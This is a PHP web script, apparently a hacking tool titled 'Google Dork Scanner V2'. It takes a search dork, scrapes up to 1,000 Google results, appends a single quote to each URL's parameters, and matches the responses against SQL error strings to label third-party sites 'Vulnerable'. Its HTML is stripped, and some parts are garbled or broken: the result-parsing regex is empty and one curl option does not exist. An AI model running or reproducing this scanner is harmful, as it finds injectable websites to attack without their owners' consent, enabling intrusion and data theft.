Google Dork Scanner V2"; echo "
"; echo "Dork:

"; echo ""; echo "

"; if($_POST['dork']) { @set_time_limit(0); @error_reporting(0); @ignore_user_abort(true); ini_set('memory_limit', '128M'); $google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N"; $i = 0; $a = 0; $b = 0; while($b <= 900) { $a = 0; flush(); ob_flush(); echo "@ Pages: [ $b ]
"; echo "@ Dork: [ ".$_POST['dork']." ]
"; echo "@ Google Scanner ! .
"; flush(); ob_flush(); if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) { echo "See something but not found??
"; flush(); ob_flush(); break; } preg_match_all("/

/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites); echo "Result of injection...
"; flush(); ob_flush(); while(1) { if(preg_match("/sql syntax|mysql_|different number of column|syntax error converting|error in your SQL syntax|OLE DB Provider for ODBC Drivers|ODBC SQL Server Driver|Incorrect syntax near|Command error|SQLServer JDBC Driver|The error occurred in|SELECT * FROM|mysqld-4.1.22-community-nt-log|ODBC 3.51 Driver|Microsoft JET Database Engine error|ODBC Microsoft Access Driver/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) { echo "
".str_replace("=", "='", $sites[2][$a])." <== Yeah..Vulnerable !
"; } else { echo "".str_replace("=", "='", $sites[2][$a])." <== Not Vulnerable..sorry!
"; flush(); ob_flush(); } if($a > count($sites[2])-2) { echo "Lets..scan other page..
"; break; } $a = $a+1; } $b = $b+100; } } function Connect_Host($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_FOLLOW, 0); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $data = curl_exec($ch); if($data) { return $data; } else { return 0; } } function Clean($text) { return htmlspecialchars($text, ENT_QUOTES); } ?>